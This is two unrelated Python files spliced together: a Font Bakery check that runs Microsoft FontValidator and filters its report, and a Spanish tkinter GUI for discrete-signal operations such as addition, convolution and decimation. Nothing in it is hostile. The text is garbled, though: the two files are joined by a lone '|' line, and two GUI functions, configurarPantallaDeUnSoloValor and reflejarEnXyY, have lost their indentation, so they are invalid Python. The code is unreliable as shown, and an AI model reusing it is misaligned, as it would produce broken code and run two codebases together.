profile_imports = ['.shared_conditions']
# The profile that auto_register() (at the bottom of this file) fills in.
profile = profile_factory(default_section=Section("Checks inherited from Microsoft Font Validator"))
@check(
    id = 'com.google.fonts/check/fontvalidator',
    proposal = 'legacy:check/037'
)
def com_google_fonts_check_fontvalidator(font):
    """Checking with Microsoft Font Validator.

    Runs the external FontValidator tool on *font*, parses the XML report
    it writes next to the font file, and re-emits the grouped findings as
    Font Bakery statuses (with some FontVal messages muted or downgraded).
    """
    # In some cases we want to override the severity level of
    # certain checks in FontValidator:
    downgrade_to_warn = [
        # There are reports that this fontval check has an out-of-date
        # understanding of valid bits in fsSelection.
        # More info at:
        # https://github.com/googlei18n/fontmake/issues/414#issuecomment-379408127
        "There are undefined bits set in fsSelection field",
        # FIX-ME: Why did we downgrade this one to WARN?
        "Misoriented contour"
    ]
    # Some other checks we want to completely disable:
    disabled_fval_checks = [
        # FontVal E4012 thinks that
        # "Versions 0x00010000 and 0x0001002 are currently
        # the only defined versions of the GDEF table."
        # but the GDEF chapter of the OpenType specification at
        # https://docs.microsoft.com/en-us/typography/opentype/spec/gdef
        # describes GDEF header version 1.3, which is not yet recognized
        # by FontVal, thus resulting in this spurious false-FAIL:
        "The version number is neither 0x00010000 nor 0x0001002",
        # These messages below are simply fontval giving user feedback
        # on the progress of running it. It has nothing to do with
        # actual issues on the font files:
        "Validating glyph with index",
        "Table Test:",
        # No software is affected by Mac strings nowadays.
        # More info at: googlei18n/fontmake#414
        "The table doesn't contain strings for Mac platform",
        "The PostScript string is not present for both required platforms",
        # Font Bakery has got a native check for the xAvgCharWidth field
        # which is: com.google.fonts/check/xavgcharwidth
        "The xAvgCharWidth field does not equal the calculated value",
        # The optimal ordering suggested by FVal check W0020 seems to only be
        # relevant to performance optimizations on old versions of Windows
        # running on old hardware. Since such performance considerations
        # are most likely negligible, we're not going to bother users with
        # this check's table ordering requirements.
        # More info at:
        # https://github.com/googlefonts/fontbakery/issues/2105
        "Tables are not in optimal order",
        # Font Bakery has its own check for required/optional tables:
        # com.google.fonts/check/required_tables
        "Recommended table is missing"
    ]
    # There are also some checks that do not make
    # sense when we're dealing with variable fonts:
    VARFONT_disabled_fval_checks = [
        # Variable fonts typically do have lots of self-intersecting
        # contours because they are used to draw each portion
        # of variable glyph features.
        "Intersecting contours",
        "Intersecting components of composite glyph",
        # DeltaFormat = 32768 (same as 0x8000) means VARIATION_INDEX,
        # according to https://docs.microsoft.com/en-us/typography/opentype/spec/chapter2
        # The FontVal problem description for this check (E5200) only mentions
        # the other values as possible valid ones. So apparently this means FontVal
        # implementation is not up-to-date with more recent versions of the OpenType spec
        # and that's why these spurious FAILs are being emitted.
        # That's good enough reason to mute it.
        # More info at:
        # https://github.com/googlefonts/fontbakery/issues/2109
        "The device table's DeltaFormat value is invalid"
    ]
    from fontTools.ttLib import TTFont
    if is_variable_font(TTFont(font)):
        disabled_fval_checks.extend(VARFONT_disabled_fval_checks)
    try:
        import subprocess
        fval_cmd = [
            "FontValidator", "-file", font, "-all-tables",
            "-report-in-font-dir", "-no-raster-tests"
        ]
        subprocess.check_output(fval_cmd, stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError as e:
        # FontValidator exits non-zero when it finds issues; its output is
        # still useful, so filter the disabled messages and report the rest.
        filtered_msgs = ""
        for line in e.output.decode().split("\n"):
            disable_it = False
            for substring in disabled_fval_checks:
                if substring in line:
                    disable_it = True
            if not disable_it:
                filtered_msgs += line + "\n"
        yield INFO, \
              Message("fontval-returned-error",
                      ("Microsoft Font Validator returned an error code."
                       " Output follows :\n\n{}\n").format(filtered_msgs))
    except (OSError, IOError) as error:
        yield ERROR, \
              Message("fontval-not-available",
                      "Mono runtime and/or Microsoft Font Validator"
                      " are not available!")
        raise error
    def report_message(msg, details):
        # Render one FontValidator report entry as a human-readable string.
        if details:
            if isinstance(details, list) and len(details) > 1:
                # We'll print lists with one item per line for
                # improved readability.
                if None in details:
                    details.remove(None)
                # A designer will likely not need the full list
                # in order to fix a problem.
                # Showing only the 10 first ones is more than enough
                # and helps avoid flooding the report.
                if len(details) > 25:
                    num_similar = len(details) - 10
                    details = details[:10]
                    details.append(f"NOTE: {num_similar} other similar"
                                   " results were hidden!")
                details = '\n\t- ' + '\n\t- '.join(details)
            return f"MS-FonVal: {msg} DETAILS: {details}"
        else:
            return f"MS-FonVal: {msg}"
    # FontValidator drops its reports next to the font file
    # (see -report-in-font-dir above).
    xml_report_file = f"{font}.report.xml"
    html_report_file = f"{font}.report.html"
    fval_file = os.path.join(os.path.dirname(font), 'fval.xsl')
    # Group reports by message so identical findings are emitted once.
    grouped_msgs = {}
    with open(xml_report_file, "rb") as xml_report:
        from lxml import etree
        doc = etree.fromstring(xml_report.read())
        for report in doc.iterfind('.//Report'):
            msg = report.get("Message")
            details = report.get("Details")
            disable_it = False
            for substring in disabled_fval_checks:
                if substring in msg:
                    disable_it = True
            if disable_it:
                continue
            if msg not in grouped_msgs:
                grouped_msgs[msg] = {"errortype": report.get("ErrorType"),
                                     "details": [details]}
            else:
                if details not in grouped_msgs[msg]["details"]:
                    # avoid cluttering the output with tons of identical reports
                    # yield INFO, 'grouped_msgs[msg]["details"]: {}'.format(grouped_msgs[msg]["details"])
                    grouped_msgs[msg]["details"].append(details)
    # ---------------------------
    # Clean-up generated files...
    os.remove(xml_report_file)
    # FontVal internal detail: HTML report generated only on non-Windows due to
    # Mono or the used HTML renderer not being able to render XML with a
    # stylesheet directly. https://github.com/googlefonts/fontbakery/issues/1747
    if os.path.exists(html_report_file):
        os.remove(html_report_file)
    os.remove(fval_file)
    # ---------------------------
    # Here we start emitting the grouped log messages
    for msg, data in grouped_msgs.items():
        # But before printing we try to make the "details" more
        # readable. Otherwise the user would get the text terminal
        # flooded with messy data.
        # No need to print it as a list if we really only
        # got one log message of this kind:
        if len(data["details"]) == 1:
            data["details"] = data["details"][0]
        # Simplify the list of glyph indices by only displaying
        # their numerical values in a list:
        for glyph_index in ["Glyph index ", "glyph# "]:
            if data["details"] and \
               data["details"][0] and \
               glyph_index in data["details"][0]:
                try:
                    data["details"] = {'Glyph index': [int(x.split(glyph_index)[1])
                                                       for x in data["details"]]}
                    break
                except ValueError:
                    pass
        # And, finally, the log messages are emitted:
        if data["errortype"] == "P":
            yield PASS, report_message(msg, data["details"])
        elif data["errortype"] == "E":
            status = FAIL
            # Known-noisy FAILs are downgraded to WARN (see list above).
            for substring in downgrade_to_warn:
                if substring in msg:
                    status = WARN
            yield status, Message("fontval-error", report_message(msg, data["details"]))
        elif data["errortype"] == "W":
            yield WARN, Message("fontval-warn", report_message(msg, data["details"]))
        else:
            yield INFO, Message("fontval-info", report_message(msg, data["details"]))
# Register every @check defined in this module into the profile.
profile.auto_register(globals())
|
from tkinter import *
import matplotlib.pyplot as plt
from matplotlib import pyplot
import numpy as np
# Archivos de uso común
from senalDiscreta import *
from manejadorDeSenales import *
# Archivos que contienen las operaciones ----------------------------- AGREGAR AQUI SUS ARCHIVOS CORRESPONDIENTES A SUS OPERACIONES
from operacionSuma import *
from operacionResta import *
from operacionReflejo import *
from operacionConvolucion import *
from operacionAmplificacionAtenuacion import *
from operacionInterpolacionDiezmacion import *
from operacionDesplazamiento import *
ventana = Tk()
# Text-field inputs when a sequence of values is typed in.
# L = Left, O = Origin, R = Right
xL = StringVar()
xO = StringVar()
xR = StringVar()
# Operation options
multiplicador = StringVar()
factorInterpolacionDiezmacion = StringVar()
udsDesplazamiento = IntVar()
hL = StringVar()
hO = StringVar()
hR = StringVar()
# Periodicity flags for each signal
xesperiodica = BooleanVar()
hesperiodica = BooleanVar()
# Variables for particular operations
opcionreflejo = IntVar()  # Which axis to reflect around
# Variables for status messages
estadoGrabacion = StringVar()
# The following lists exist so that x(n) and h(n) end
# up with the same number of elements: whichever is
# shorter gets padded with 0's on the left or right
# as appropriate.
newH = []  # h(n) normalized to the standard length
newX = []  # x(n) normalized to the standard length
newX2 = []
puntosEjeH = []  # Horizontal-axis points where the lists are plotted
def crearVentana():
    ''' Create the GUI window and set up its basic properties '''
    global ventana
    # Window dimensions and position on screen
    ventana.geometry("700x650+350+60")
    ventana.title("Proyecto de Señales")
    # Only horizontal resizing is allowed
    ventana.resizable(width=True, height=False)
def verInicio():
    '''
    GUI helper.\n
    Shows the initial controls for choosing how values are entered
    (typed sequence vs. recorded audio signal), resetting module state.
    '''
    global puntosEjeH,newX,newH
    newH = []
    newX = []
    puntosEjeH = []
    # A background image is used because it is the only way found
    # to cover the previous screen, so every new "scene" must start
    # by re-drawing this background.
    imagenFondo = PhotoImage(file="imgs/fondo.pgm")
    Label(ventana, image=imagenFondo).place(x=0, y=0)
    # On-screen heading label
    Label(ventana, text="Entrada:",
        font=("Arial", 30)).place(x=275, y=5)
    Button(ventana, text="Secuencia de valores", cursor="hand2",
        bd=10, background="#b5ead7", height=0, command=introducirValores,
        font=("Arial", 19)).place(x=55, y=70)
    # This button should lead to a screen where
    # an audio clip can be recorded.
    Button(ventana, text=" Señal de audio ", cursor="hand2",
        bd=10, background="#b5ead7", height=0, command=introducirValoresAudio,
        font=("Arial", 19)).place(x=360, y=70)
    ventana.mainloop()
def introducirValores():
    '''
    GUI function.\n
    Switches the window to value-entry mode: 3 entries for x(n), 3 for h(n),
    and one button per available operation.
    '''
    xPosicion = 100
    yPosicion = 100
    espacio = 65
    # Background image covering the previous screen (see verInicio)
    imagenFondo = PhotoImage(file="imgs/fondo.pgm")
    Label(ventana, image=imagenFondo).place(x=0, y=0)
    # Back-to-start button
    Button(ventana, text="↶", cursor="hand2",
           bd=10, background="#ff9aa2", height=0, command=verInicio,
           font=("Arial", 15)).place(x=2, y=5)
    # x(n) entry row: left values, origin value, right values
    Label(ventana, text="x(n){",
          font=("Arial", 25)).place(x=50, y=15)
    Entry(ventana,justify=RIGHT, textvariable=xL, width=10,
          font=("Arial", 25)).place(x=130, y=20)
    Entry(ventana, textvariable=xO, width=2,
          font=("Arial", 25)).place(x=330, y=20)
    Entry(ventana, textvariable=xR, width=10,
          font=("Arial", 25)).place(x=385, y=20)
    Label(ventana, text="}",
          font=("Arial", 25)).place(x=580, y=15)
    # h(n) entry row: left values, origin value, right values
    Label(ventana, text="h(n){",
          font=("Arial", 25)).place(x=50, y=75)
    Entry(ventana, justify=RIGHT, textvariable=hL, width=10,
          font=("Arial", 25)).place(x=130, y=80)
    Entry(ventana, textvariable=hO, width=2,
          font=("Arial", 25)).place(x=330, y=80)
    Entry(ventana, textvariable=hR, width=10,
          font=("Arial", 25)).place(x=385, y=80)
    Label(ventana, text="}",
          font=("Arial", 25)).place(x=580, y=75)
    Label(ventana, text="ORIGEN",
          font=("Arial", 10)).place(x=322, y=62)
    # Operation buttons
    Button(ventana, text="Sumar", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=sumar,
           font=("Arial", 16)).place(x=xPosicion, y=espacio + yPosicion)
    Button(ventana, text="Restar", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=restar,
           font=("Arial", 16)).place(x=xPosicion + 97, y=espacio + yPosicion)
    Button(ventana, text="Amplificación / Atenuación", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=amplificarAtenuar,
           font=("Arial", 16)).place(x=xPosicion, y=espacio * 2 + yPosicion)
    Entry(ventana,justify=CENTER, textvariable=multiplicador, width=4,
          font=("Arial", 16)).place(x=385, y=248)
    Label(ventana, text="Multiplicador",
          font=("Arial", 10)).place(x=380, y=225)
    Button(ventana, text="Reflejo en X y Y", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=reflejarEnXyY,
           font=("Arial", 16)).place(x=xPosicion, y=espacio*3+yPosicion)
    Button(ventana, text="Desplazamiento", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=desplazar,
           font=("Arial", 16)).place(x=xPosicion, y=espacio*4+yPosicion)
    Entry(ventana,justify=CENTER, textvariable=udsDesplazamiento, width=4,
          font=("Arial", 16)).place(x=285, y=323+53)
    Label(ventana, text="Unidades a desplazar",
          font=("Arial", 10)).place(x=285+5, y=300+53)
    Entry(ventana,justify=CENTER, textvariable=factorInterpolacionDiezmacion, width=4,
          font=("Arial", 16)).place(x=405, y=448)
    Label(ventana, text="Factor de diezmación/interpolación",
          font=("Arial", 10)).place(x=400, y=425)
    Button(ventana, text="Diezmación", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=diezmar,
           font=("Arial", 16)).place(x=xPosicion, y=espacio*5+yPosicion)
    Button(ventana, text="Interpolación", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=interpolar,
           font=("Arial", 16)).place(x=xPosicion+145, y=espacio*5+yPosicion)
    Button(ventana, text="Convolución", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=convolusionar,
           font=("Arial", 16)).place(x=xPosicion, y=espacio*6+yPosicion)
    Button(ventana, text="FFT", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=fft,
           font=("Arial", 16)).place(x=xPosicion, y=espacio*7+yPosicion)
    Button(ventana, text="Pruebas", command=tests).place(x=xPosicion+15, y=espacio*8+yPosicion)
    # Checkboxes marking each signal as periodic
    Checkbutton(ventana, text="Periodica", variable=xesperiodica).place(x=615, y=25)
    Checkbutton(ventana, text="Periodica", variable=hesperiodica).place(x=615, y=85)
    ventana.mainloop()
def introducirValoresAudio():
    """
    GUI function.\n
    Configures the screen so that the program can work with recorded audio
    instead of typed sequences.
    """
    xPosicion = 100
    yPosicion = 100
    espacio = 65
    # Background image covering the previous screen (see verInicio)
    imagenFondo = PhotoImage(file="imgs/fondo.pgm")
    Label(ventana, image=imagenFondo).place(x=0, y=0)
    # Back-to-start button
    Button(ventana, text="↶", cursor="hand2",
           bd=10, background="#ff9aa2", height=0, command=verInicio,
           font=("Arial", 15)).place(x=2, y=5)
    # Recording controls and status label
    Button(ventana, text="Grabar", command=grabarGUI, font=("Arial", 15)).place(x=100, y=15)
    Label(ventana, textvariable=estadoGrabacion,
          font=("Arial", 10)).place(x=200, y=20)
    estadoGrabacion.set("Sin grabar")
    # NOTE(review): both playback buttons are wired to the placeholder
    # tests() command — playback appears unimplemented.
    Button(ventana, text="Escuchar entrada", command=tests, font=("Arial", 15)).place(x=100, y=75)
    Button(ventana, text="Escuchar salida", command=tests, font=("Arial", 15)).place(x=100+200, y=75)
    # Operation buttons (audio variants where available)
    Button(ventana, text="Amplificación / Atenuación", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=amplificarAtenuar,
           font=("Arial", 16)).place(x=xPosicion, y=espacio * 2 + yPosicion)
    Entry(ventana,justify=CENTER, textvariable=multiplicador, width=4,
          font=("Arial", 16)).place(x=385, y=248)
    Label(ventana, text="Multiplicador",
          font=("Arial", 10)).place(x=380, y=225)
    Button(ventana, text="Reflejo en X y Y", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=reflejarEnXyY,
           font=("Arial", 16)).place(x=xPosicion, y=espacio*3+yPosicion)
    Button(ventana, text="Desplazamiento", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=desplazar,
           font=("Arial", 16)).place(x=xPosicion, y=espacio*4+yPosicion)
    Entry(ventana,justify=CENTER, textvariable=udsDesplazamiento, width=4,
          font=("Arial", 16)).place(x=285, y=323+53)
    Label(ventana, text="Unidades a desplazar",
          font=("Arial", 10)).place(x=285+5, y=300+53)
    Entry(ventana,justify=CENTER, textvariable=factorInterpolacionDiezmacion, width=4,
          font=("Arial", 16)).place(x=405, y=448)
    Label(ventana, text="Factor de diezmación/interpolación",
          font=("Arial", 10)).place(x=400, y=425)
    Button(ventana, text="Diezmación", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=diezmarAudio,
           font=("Arial", 16)).place(x=xPosicion, y=espacio*5+yPosicion)
    Button(ventana, text="Interpolación", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=interpolarAudio,
           font=("Arial", 16)).place(x=xPosicion+145, y=espacio*5+yPosicion)
    Button(ventana, text="FFT", cursor="hand2",
           bd=8, background="#ffb3cc", height=1, command=fft,
           font=("Arial", 16)).place(x=xPosicion, y=espacio*7+yPosicion)
    Button(ventana, text="Pruebas", command=tests).place(x=xPosicion+15, y=espacio*8+yPosicion)
    ventana.mainloop()
def tests():
    """Placeholder command wired to the 'Pruebas' buttons; just prints a marker."""
    marcador = "test"
    print(marcador)
def emparejarPuntosEjeHConInicio(senal):
    """
    Rebuild the global horizontal-axis points to match the given signal.

    Parameters:
        senal (SenalDiscreta): signal whose start index and length define
            the plotting positions stored in the global ``puntosEjeH``
    """
    global puntosEjeH
    inicio = senal.obtener_indice_inicio()
    # One axis position per sample, starting at the signal's start index.
    puntosEjeH = list(range(inicio, inicio + senal.obtener_longitud()))
def configurarPantalla(operacion, resx, resh, resg):
    """
    Set up the result screen for an operation with two inputs and one output.
    Parameters:
        operacion (str): Title of the operation performed
        resx (str): Sequence of signal x(n) formatted as {...,#,#,..}
        resh (str): Sequence of signal h(n) formatted as {...,#,#,..}
        resg (str): Sequence of signal g(n) formatted as {...,#,#,..}
    """
    # Background image covering the previous screen; the only way found
    # to replace the previous "scene", so every new scene starts with it.
    imagenFondo = PhotoImage(file="imgs/fondo.pgm")
    Label(ventana, image=imagenFondo).place(x=0, y=0)
    # Back-to-start button
    Button(ventana, text="↶", cursor="hand2",
           bd=10, background="#ff9aa2", height=0, command=verInicio,
           font=("Arial", 19)).place(x=5, y=5)
    # Operation title
    Label(ventana, text=operacion,
          font=("Arial", 45)).place(x=270, y=50)
    # The three formatted sequences, stacked vertically
    Label(ventana, text=resx,
          font=("Arial", 25)).place(x=50, y=150)
    Label(ventana, text=resh,
          font=("Arial", 25)).place(x=50, y=220)
    Label(ventana, text=resg,
          font=("Arial", 25)).place(x=50, y=290)
"""
Para las operaciones que solo tienen una secuencia de entrada
y una de salida
"""
def configurarPantallaDeUnSoloValor(operacion, xn, gn):
"""
Configura la pantalla dependiendo que operación se haga
Parameters:
operacion (str): El título de la operación realizada
resx (str): La secuencia de la señal x(n) con formato {...,#,#,..}
resh (str): La secuencia de la señal h(n) con formato {...,#,#,..}
resg (str): La secuencia de la señal g(n) con formato {...,#,#,..}
"""
# Uso una imagen como fondo, debido a que es la
# unica forma que encuentro para tapar la
# ventana anterior, por lo que al crear un
# nuevo escenario, siempre se tiene que poner esto
imagenFondo = PhotoImage(file="imgs/fondo.pgm")
Label(ventana, image=imagenFondo).place(x=0, y=0)
#Coloca el boton regresa al inicio
Button(ventana, text="↶", cursor="hand2",
bd=10, background="#ff9aa2", height=0, command=verInicio,
font=("Arial", 19)).place(x=5, y=5)
#Se imprimen los arreglos emparejados
#y el resultado
resx = "x(n){"
for e in xn:
if e != "":
resx = resx + str(e) + ","
else:
resx = resx + str(e)
resx = resx + "}"
resg = "g(n){"
for e in gn:
if e != "":
resg = resg+str(e)+","
else:
resg = resg + str(e)
resg = resg+"}"
#Titulo de la operacion
Label(ventana, text=operacion,
font=("Arial", 45)).place(x=240, y=50)
Label(ventana, text=resx,
font=("Arial", 25)).place(x=50, y=150)
Label(ventana, text=resg,
font=("Arial", 25)).place(x=50, y=290)
def obtenerSecuencia(variable, senal):
    """
    Build the printable sequence string of a signal.

    Parameters:
        variable (str): The letter naming the signal (e.g. "x", "h", "g")
        senal (SenalDiscreta): The discrete signal

    Returns:
        str: "<variable>(n) = [d1,d2,...,]" — each non-empty datum keeps a
        trailing comma, reproducing the original formatting exactly.
    """
    partes = [variable + "(n) = ["]
    for dato in senal.obtener_datos():
        partes.append(str(dato) + "," if dato != "" else str(dato))
    partes.append("]")
    return "".join(partes)
def sumar():
    """
    Command bound to the "Sumar" (add) button.
    Reads both signals from the GUI, expands periodic signals one period
    to each side, adds them, and shows/plots the result.
    """
    # Get data from the GUI
    senales = emparejarValores()
    xn = senales[0]
    hn = senales[1]
    # Expand periodic signals one period to each side, re-matching lengths
    if xn.es_periodica():
        xn.expandir_periodo_izquierda(1)
        xn.expandir_periodo_derecha(1)
        hn.empatar(xn)
    if hn.es_periodica():
        hn.expandir_periodo_izquierda(1)
        hn.expandir_periodo_derecha(1)
        xn.empatar(hn)
    emparejarPuntosEjeHConInicio(xn)
    # Perform the operation
    gn = obtenerSuma(xn, hn)  # ------------------LINE TO CHANGE
    gn.empatar(xn)
    gn.empatar(hn)
    operacion = "Suma"  # ------------------------LINE TO CHANGE
    # Configure the GUI
    configurarPantalla(operacion, obtenerSecuencia("x", xn), obtenerSecuencia("h", hn), obtenerSecuencia("g", gn))
    # Plot
    graficar(puntosEjeH, xn.obtener_datos(), hn.obtener_datos(), gn.obtener_datos(), operacion)
    ventana.mainloop()
def restar():
    """
    Command bound to the "Restar" (subtract) button.
    Reads both signals from the GUI, expands periodic signals one period
    to each side, subtracts them, and shows/plots the result.
    """
    # Get data from the GUI
    senales = emparejarValores()
    xn = senales[0]
    hn = senales[1]
    # Expand periodic signals one period to each side, re-matching lengths
    if xn.es_periodica():
        xn.expandir_periodo_izquierda(1)
        xn.expandir_periodo_derecha(1)
        hn.empatar(xn)
    if hn.es_periodica():
        hn.expandir_periodo_izquierda(1)
        hn.expandir_periodo_derecha(1)
        xn.empatar(hn)
    emparejarPuntosEjeHConInicio(xn)
    # Perform the operation
    gn = obtenerResta(xn, hn)  # ------------------LINE TO CHANGE
    gn.empatar(xn)
    gn.empatar(hn)
    operacion = "Restar"  # -----------------------LINE TO CHANGE
    # Configure the GUI
    configurarPantalla(operacion, obtenerSecuencia("x", xn), obtenerSecuencia("h", hn), obtenerSecuencia("g", gn))
    # Plot
    graficar(puntosEjeH, xn.obtener_datos(), hn.obtener_datos(), gn.obtener_datos(), operacion)
    ventana.mainloop()
def amplificarAtenuar():
    """
    Command bound to the "Amplificación / Atenuación" button.
    Scales x(n) by the multiplier taken from the GUI entry.
    """
    global newX
    concatenarSecuenciaX()
    # Perform the operation.
    # NOTE(review): this passes the plain list `newX` (filled as a side
    # effect of concatenarSecuenciaX) rather than the SenalDiscreta that
    # function returns — confirm obtenerAmplificacionAtenuacion accepts a list.
    gn = obtenerAmplificacionAtenuacion(newX, float(multiplicador.get()))  # ------------------LINE TO CHANGE
    if float(multiplicador.get())>1:
        operacion = "Amplificacion"
    else:
        # NOTE(review): a multiplier of exactly 1 is labeled "Atenuacion".
        operacion = "Atenuacion"  # ------------------------LINE TO CHANGE
    # Configure the GUI
    configurarPantallaDeUnSoloValor(operacion, newX, gn)
    # Plot
    graficarSolo2(puntosEjeH, newX, gn, operacion)
    ventana.mainloop()
"""
Hice otra función para reflejar al mismo tiempo en X e Y, .
"""
def reflejarEnXyY():
"""
Comando asociado al botón "reflejar"
"""
# Obtiene datos de GUI
senal = concatenarSecuenciaX()
xn = senal[0]
# Se realiza la operación
gnY = obtener_reflejoY(xn)
gnY = obtener_reflejoY(xn)
#gnY = obtener_reflejoY(xn)
datosAux = xn.obtener_datos()
for i in range(len(datosAux)):
datosAux[i] = datosAux[i] * -1
gnX = SenalDiscreta(datosAux, xn.obtener_indice_inicio(), xn.es_periodica())
operacion = "Reflejar" # ------------------------LINEA A CAMBIAR
# Se configura la GUI
configurarPantalla(operacion, obtenerSecuencia("x", xn), obtenerSecuencia("x", gnX), obtenerSecuencia("x", gnY))
# Grafica
graficarReflejo(puntosEjeH, gnX.obtener_datos(), gnY.obtener_datos(), operacion)
ventana.mainloop()
def desplazar():
    """
    Command bound to the "Desplazamiento" (shift) button.
    NOTE(review): a second `def desplazar` later in this module replaces
    this definition at import time, so this version is dead code.
    """
    # Get data from the GUI
    senales = concatenarSecuenciaX()
    xn = senales[0]
    td = udsDesplazamiento.get()
    # Perform the operation
    gn1 = obtener_Desplazamiento(xn, 1, td)  # Shift to the right
    gn2 = obtener_Desplazamiento(xn, 2, td)  # Shift to the left
    # Match lengths and rebuild the plot axis
    xn.empatar(gn1)
    emparejarPuntosEjeHConInicio(xn)
    # Debug output
    print("xn:", xn)
    print("gn1:", gn1)
    print("gn2:", gn2)
    print("pts:", puntosEjeH)
    operacion = "Desplazamiento"  # ------------------------LINE TO CHANGE
    # Configure the GUI
    configurarPantalla(operacion, obtenerSecuencia("x", xn), obtenerSecuencia("gn1", gn1), obtenerSecuencia("gn2", gn2))
    # Plot
    graficar(puntosEjeH, xn.obtener_datos(), gn1.obtener_datos(), gn2.obtener_datos(), operacion)
    ventana.mainloop()
def diezmar():
    """
    Command bound to the "Diezmación" (decimation) button.
    Decimates x(n) by the factor taken from the GUI entry.
    """
    # Get data from the GUI
    senales = concatenarSecuenciaX()
    xn = senales[0]
    operacion = "Diezmación"
    # Force a non-positive start index before decimating
    if(xn.obtener_indice_inicio() > 0):
        xn.asignar_indice_inicio(-xn.obtener_indice_inicio())
    # Perform the operation
    gn = obtenerDiezmacion(xn, int(factorInterpolacionDiezmacion.get()))
    # Configure the GUI
    configurarPantallaDeUnSoloValor(operacion, xn.obtener_datos(), gn.obtener_datos())
    # Plot
    gn.empatar(xn)
    graficarSolo2(range(gn.obtener_longitud()), xn.obtener_datos(), gn.obtener_datos(), operacion)
    ventana.mainloop()
def interpolar():
    """
    Command bound to the "Interpolación" (interpolation) button.
    Interpolates x(n) by the factor taken from the GUI entry.
    """
    # Get data from the GUI
    seniales = concatenarSecuenciaX()
    xn = seniales[0]
    operacion = "Interpolación"
    # Force a non-positive start index before interpolating
    if(xn.obtener_indice_inicio() > 0):
        xn.asignar_indice_inicio(-xn.obtener_indice_inicio())
    # Perform the operation
    gn = obtenerInterpolacion(xn, int(factorInterpolacionDiezmacion.get()))
    # Configure the GUI
    configurarPantallaDeUnSoloValor(operacion, xn.obtener_datos(), gn.obtener_datos())
    # Plot
    gn.empatar(xn)
    graficarSolo2(range(gn.obtener_longitud()), xn.obtener_datos(), gn.obtener_datos(), operacion)
    ventana.mainloop()
def diezmarAudio():
    """
    Command bound to the "Diezmación" button when the GUI is configured to
    process audio. Works on the globally recorded signal `senal`.
    """
    # Copy the recorded audio into a fresh non-periodic signal at index 0
    xn = SenalDiscreta(senal.obtener_datos().copy().tolist(), 0, False)
    operacion = "Diezmación"
    factor = int(factorInterpolacionDiezmacion.get())
    # Perform the operation
    gn = obtenerDiezmacion(xn, factor)
    # Plot
    gn.asignar_indice_inicio(0)
    gn.empatar(xn)
    graficarInterpolacionDiezmacion(xn.obtener_datos(), gn.obtener_datos(), operacion, factor)
    ventana.mainloop()
    # NOTE(review): only reached after the main loop exits — confirm this
    # playback call is meant to run that late.
    obtenerAudioDesdeSenalDiscreta(gn)
def interpolarAudio():
    """
    Command bound to the "Interpolación" button when the GUI is configured
    to process audio. Works on the globally recorded signal `senal`.
    """
    # Copy the recorded audio into a fresh non-periodic signal at index 0
    xn = SenalDiscreta(senal.obtener_datos().copy().tolist(), 0, False)
    operacion = "Interpolación"
    factor = int(factorInterpolacionDiezmacion.get())
    # Perform the operation
    gn = obtenerInterpolacion(xn, factor)
    # Plot
    gn.empatar(xn)
    graficarInterpolacionDiezmacion(xn.obtener_datos(), gn.obtener_datos(), operacion, factor)
    ventana.mainloop()
    # NOTE(review): only reached after the main loop exits — confirm this
    # playback call is meant to run that late.
    obtenerAudioDesdeSenalDiscreta(gn)
# The misspelling is deliberate: a correctly-spelled `convolucionar`
# function already exists elsewhere.
def convolusionar():
    """
    Command bound to the "Convolución" (convolution) button.
    """
    # Get data from the GUI
    senales = emparejarValores()
    xn = senales[0]
    hn = senales[1]
    # Perform the operation
    gn = convolucionar(xn, hn)  # ------------------LINE TO CHANGE
    # Match lengths against the (longer) convolution result
    xn.empatar(gn)
    hn.empatar(gn)
    emparejarPuntosEjeHConInicio(gn)
    operacion = "Convolución"  # ------------------------LINE TO CHANGE
    # Configure the GUI
    configurarPantalla(operacion, obtenerSecuencia("x", xn), obtenerSecuencia("h", hn), obtenerSecuencia("g", gn))
    # Plot
    graficar(puntosEjeH, xn.obtener_datos(), hn.obtener_datos(), gn.obtener_datos(), operacion)
    ventana.mainloop()
def fft():
    """
    Command bound to the "FFT" button.
    NOTE(review): this currently performs the same sum as sumar() — the
    actual FFT operation appears not to be implemented yet.
    """
    # Get data from the GUI
    senales = emparejarValores()
    xn = senales[0]
    hn = senales[1]
    # Perform the operation
    gn = obtenerSuma(xn, hn)  # ------------------LINE TO CHANGE
    operacion = "Suma"  # ------------------------LINE TO CHANGE
    # Configure the GUI
    configurarPantalla(operacion, obtenerSecuencia("x", xn), obtenerSecuencia("h", hn), obtenerSecuencia("g", gn))
    # Plot
    graficar(puntosEjeH, xn.obtener_datos(), hn.obtener_datos(), gn.obtener_datos(), operacion)
    ventana.mainloop()
# TODO: Validate the entry values
# TODO: Change logic for periodic and non-periodic signals
def emparejarValores():
    '''Makes the lists for x(n) and h(n) the same size (assigning them to
    newX and newH) and prepares the horizontal-axis points for plotting.
    Returns:
        list: [xn, hn] — SenalDiscreta objects for x(n) (position 0) and
        h(n) (position 1), already length-matched
    '''
    global puntosEjeH,newX,newH
    # split() separates the entry string at every ","
    hLAux = hL.get().split(",")
    xLAux = xL.get().split(",")
    hRAux = hR.get().split(",")
    xRAux = xR.get().split(",")
    # Reset newH and puntosEjeH
    newH = []
    puntosEjeH = []
    # Pad h(n) on the left with 0's if x(n) has more left elements
    if len(xLAux)>len(hLAux):
        for i in range(len(xLAux)-len(hLAux)):
            newH.append(float(0))
    for elemento in hLAux:
        if elemento != "":
            newH.append(float(elemento))
        else:
            newH.append(float(0))
    newH.append(float(hO.get()))
    # To store the origin, count from it and label the elements to the
    # left the way they would appear on the graph
    for i in range(len(newH)):
        puntosEjeH.append(i*(-1))
    # The list is reversed because it holds e.g. 0,-1,-2 and must be
    # inverted to read like a normal graph axis
    puntosEjeH.reverse()
    for elemento in hRAux:
        if elemento != "":
            newH.append(float(elemento))
        else:
            newH.append(float(0))
